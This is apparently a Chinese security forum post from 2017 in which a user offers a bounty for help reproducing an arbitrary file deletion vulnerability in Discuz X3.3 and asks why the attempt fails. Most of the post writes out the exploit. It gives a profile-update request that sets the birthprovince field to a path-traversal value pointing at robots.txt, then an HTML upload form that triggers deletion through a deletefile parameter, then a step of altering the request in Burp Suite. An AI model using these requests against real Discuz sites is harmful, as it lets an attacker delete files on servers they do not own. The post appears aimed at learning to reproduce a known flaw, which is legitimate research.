-
-
未解决
[悬赏]discuz x3.3任意文件删除漏洞删除失败
10.00雪花
-
发表于:
2017-10-2 03:20
5904
-
未解决 [悬赏]discuz x3.3任意文件删除漏洞删除失败
10.00雪花
①构造提交
http://dz.com/3.3/home.php?mod=spacecp&ac=profile&op=base
birthprovince=../../../robots.txt&profilesubmit=1&formhash=30ff14a7
②上传
robots.txt文件
<formaction="home.php?mod=spacecp&ac=profile&op=base&deletefile[birthprovince]=aaaaaa"method="POST"enctype="multipart/form-data">
<inputtype="file"name="birthprovince"id="file"/>
<inputtype="text"name="formhash"value="30ff14a7"/></p>
<inputtype="text"name="profilesubmit"value="1"/></p>
<inputtype="submit"value="Submit"/>
</form>
③burpsuite改包
问
①
:
改了如图 请问哪里操作失误 才不行的
问
②
:spacecp/spacecp_profile.php里的$_G['cache']['profilesetting']是哪里来的
[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!